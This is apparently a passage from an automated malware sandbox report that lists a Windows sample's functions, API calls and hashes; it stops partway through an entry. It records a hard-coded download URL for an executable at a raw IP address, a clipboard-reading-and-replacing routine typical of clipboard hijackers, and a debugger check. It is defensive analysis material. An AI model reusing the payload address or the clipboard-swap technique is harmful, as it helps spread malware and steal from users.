Function 0042E064 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC

ExitThread.KERNEL32 ref: 0042E076
CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

Function 00402394 Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
PostQuitMessage.USER32(00000000), ref: 00402559

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001562), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E

Function 02110E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02110223,?,?), ref: 02110E19
SetErrorMode.KERNEL32(00000000,?,?,02110223,?,?), ref: 02110E1E

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f41980ae68ce685da741fb8abaf3e2b422b08bc76916466801f808e01ad358d5
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: C9D0123154512877DB002A95DC09BCD7B1CDF09B66F108021FB0DD9080C770954046E5

Function 00434176 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94

Function 00403695 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00403772

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA

Function 00402819 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54

Function 00403CB8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00403CBF

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94

Function 00432775 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004327B3

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9

Function 0043CFBB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043CFFC

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4

Function 00433697 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED

Function 0040FB02 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004103B7

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D

Function 0043CCFA Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95

Function 0058B0ED Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0058B13E

Memory Dump Source

Source File: 00000004.00000002.3748774798.000000000058A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58a000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 78cbd8a4f21975036c6c62869ef79f7bbe4bf8caea98293c3b0e2341a304880c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 3C112B79A00208EFDB01DF98C989E99BFF5AF08350F058094F948AB362D771EA50DB80

Non-executed Functions

Function 02111942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 152clipboardsleepmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0211194D
Sleep.KERNEL32(00001541,0000004C), ref: 02111957

Part of subcall function 0211CE6D: _strlen.LIBCMT ref: 0211CE84

OpenClipboard.USER32(00000000), ref: 02111984
GetClipboardData.USER32(00000001), ref: 02111994
_strlen.LIBCMT ref: 021119B0
_strlen.LIBCMT ref: 021119DF
_strlen.LIBCMT ref: 02111B23
EmptyClipboard.USER32 ref: 02111B39
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 02111B46
GlobalUnlock.KERNEL32(00000000), ref: 02111B70
SetClipboardData.USER32(00000001,00000000), ref: 02111B79
GlobalFree.KERNEL32(00000000), ref: 02111B80
CloseClipboard.USER32 ref: 02111BA4
Sleep.KERNEL32(000002D2), ref: 02111BAF

Strings

4#E, xrefs: 0211195D
i, xrefs: 021119C0

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: 4#E$i
API String ID: 4246938166-2480119546
Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
Instruction ID: 5ecc20f4896757b963549c8238761e8db639eadaff945e314ad0fd8aac4b88c3
Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
Instruction Fuzzy Hash: 20512531C40784AED3219FA8EC457BCBB74FF2A306F045235D905A2162EB709B85CB6A

Function 02112357 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 02112392
GetClientRect.USER32(?,?), ref: 021123A7
GetDC.USER32(?), ref: 021123AE
CreateSolidBrush.GDI32(00646464), ref: 021123C1
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021123E0
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 02112401
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0211240C
MulDiv.KERNEL32(00000008,00000000), ref: 02112415
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02112439
SetBkMode.GDI32(?,00000001), ref: 021124C4
_wcslen.LIBCMT ref: 021124DC

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
String ID:
API String ID: 1529870607-0
Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
Instruction ID: 33707188f65ff8db7e63c70ae5df401552efa944aaf94f04f6d653f4a7ca9486
Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
Instruction Fuzzy Hash: B171EC72900228AFDB229F68DD85FAEBBBCEF09711F0041A5F509E6155DA70AF80CF14

Function 0043D668 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0043D7AE

Strings

1#INF, xrefs: 0043E9BB
1#SNAN, xrefs: 0043E9AD
1#QNAN, xrefs: 0043E9B4
1#IND, xrefs: 0043E9A6

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
Instruction ID: eb952a9da5ee3ca1a054b410db7a12ab4ba9b877121e99a49e25e720736a14a4
Opcode Fuzzy Hash: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
Instruction Fuzzy Hash: 1EC25B71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45

Function 0214B9C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0214BCE4,?,00000000), ref: 0214BA5E
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0214BCE4,?,00000000), ref: 0214BA87
GetACP.KERNEL32(?,?,0214BCE4,?,00000000), ref: 0214BA9C

Strings

ACP, xrefs: 0214B9E3
OCP, xrefs: 0214BA19

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 497d85a644527afda27f09b26c7a2f5ef03c44e2924671551a1b826aac28894f
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: E0216D26F88105AADB34CF69D901BA773A6EB44A6CB668466E90ED7110FF32DF40C350

Function 0043B75E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835

Strings

ACP, xrefs: 0043B77C
OCP, xrefs: 0043B7B2

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8

Function 0214BB99 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

Part of subcall function 02142131: _free.LIBCMT ref: 02142190
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0214219D

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0214BCA5
IsValidCodePage.KERNEL32(00000000), ref: 0214BD00
IsValidLocale.KERNEL32(?,00000001), ref: 0214BD0F
GetLocaleInfoW.KERNEL32(?,00001001,02140A0C,00000040,?,02140B2C,00000055,00000000,?,?,00000055,00000000), ref: 0214BD57
GetLocaleInfoW.KERNEL32(?,00001002,02140A8C,00000040), ref: 0214BD76

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction ID: df9b2863ee0a78bc33ecdb4266fb22d64ff93f9778605fc5c844a9c3b36aa5dc
Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
Instruction Fuzzy Hash: 35516071D48209AFDB10DFA5DC80ABEB3B9EF14708F044569E918EB150EF71DB418BA1

Function 0043B932 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9

Function 0214B261 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02142131: GetLastError.KERNEL32(?,?,0213A9DC,?,00000000,?,0213CDD6,02112474,00000000,?,00451F20), ref: 02142135
Part of subcall function 02142131: _free.LIBCMT ref: 02142168
Part of subcall function 02142131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021421A9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02140A13,?,?,?,?,0214046A,?,00000004), ref: 0214B343
_wcschr.LIBVCRUNTIME ref: 0214B3D3
_wcschr.LIBVCRUNTIME ref: 0214B3E1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02140A13,00000000,02140B33), ref: 0214B484

Memory Dump Source

Source File: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2110000_NDWffRLk7z.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: cb54da6c894b7553bee049c0b8cfcc25ac5e5256f03fa2240476eb35bfde2693
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: EC610871E84206AEDB24AF75CC45BAB73A9EF04718F54443AE91DDB180EF74E641CBA0

Function 0043AFFA Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
_wcschr.LIBVCRUNTIME ref: 0043B16C
_wcschr.LIBVCRUNTIME ref: 0043B17A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9

Function 0043B3E5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42

Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A

Memory Dump Source

Source File: 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NDWffRLk7z.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
Opcode Fuzzy Hash: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99

Function 0213A62A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0211DACD), ref: 0213A722
